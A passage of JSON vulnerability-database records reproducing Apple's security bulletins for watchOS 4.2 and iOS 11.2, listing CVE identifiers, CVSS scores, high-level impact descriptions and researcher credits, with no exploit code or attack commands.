"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13855", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13876", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7162", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-05T00:00:00", "id": "APPLE:121C0C2C932F899F870D9D5665610ED0", "href": "https://support.apple.com/kb/HT208325", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:27", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or 
releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to 
execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. 
This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with 
Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry updated January 22, 2017\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple Watch (1st Generation) and Apple Watch Series 3 \nReleased for Apple Watch Series 1 and Apple Watch Series 2 in [watchOS 4.1](<https://support.apple.com/kb/HT208220>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. 
This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## No impact\n\nwatchOS 4.2 is not impacted by the following issue: \n\n**Kernel**\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T06:10:21", "title": "About the security content of watchOS 4.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-13884", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13862"], "modified": "2018-10-18T06:10:21", "id": "APPLE:HT208325", "href": "https://support.apple.com/kb/HT208325", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T04:14:47", "description": "# About the security content of iOS 11.2\n\nThis document describes the security content of iOS 11.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.2\n\nReleased December 2, 2017\n\n**App Store**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**Calculator**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to alter currency conversion rates\n\nDescription: Exchange rates were retrieved from HTTP rather than HTTPS. 
This was addressed by enabling HTTPS for exchange rates.\n\nCVE-2017-2411: Richard Shupak (linkedin.com/in/rshupak), Seth Vargo (@sethvargo) of Google, and an anonymous researcher\n\nEntry added May 2, 2018, updated June 14, 2018\n\n**CFNetwork Session**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\nEntry updated January 10, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code 
with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOMobileFrameBuffer**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13879: Apple\n\nEntry updated October 24, 2018\n\n**IOSurface**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus 
Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input 
validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Incorrect certificate is used for encryption\n\nDescription: An S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate.\n\nCVE-2017-13874: Nicolas Devillard\n\nEntry updated April 9, 2018\n\n**Mail Drafts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. 
The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)\n\nEntry added December 21, 2017\n\n**ReplayKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A user may not have control over their screen broadcast\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13888: Dan Niemeyer of Microsoft, Peter Pau (ArcanaArt.com)\n\nEntry added June 21, 2018, updated September 8, 2020\n\n**SafariViewController**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-13891: Janne Raiskila (@raiskila)\n\nEntry added June 21, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security 
working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 13, 2017, updated May 4, 2018\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation \nReleased for iPhone 7 and later 
and iPad Pro 9.7-inch (early 2016) and later in [iOS 11.1](<https://support.apple.com/kb/HT208222>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: September 08, 2020\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-02T00:00:00", "type": "apple", "title": "About the security content of iOS 11.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13847", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13860", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13874", "CVE-2017-13876", "CVE-2017-13879", "CVE-2017-13880", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13888", "CVE-2017-13891", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-2411", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7152", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-02T00:00:00", "id": "APPLE:3CD8680715FC8DF4A758CC6012471868", "href": "https://support.apple.com/kb/HT208334", "cvss": {"score": 
9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:20", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.2\n\nReleased December 2, 2017\n\n**App Store**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**Calculator**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to alter currency conversion rates\n\nDescription: Exchange rates were retrieved from HTTP rather than HTTPS. 
This was addressed by enabling HTTPS for exchange rates.\n\nCVE-2017-2411: Richard Shupak (linkedin.com/in/rshupak), Seth Vargo (@sethvargo) of Google, and an anonymous researcher\n\nEntry added May 2, 2018, updated June 14, 2018\n\n**CFNetwork Session**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\nEntry updated January 10, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code 
with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOMobileFrameBuffer**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13879: Apple\n\nEntry updated October 24, 2018\n\n**IOSurface**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus 
Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input 
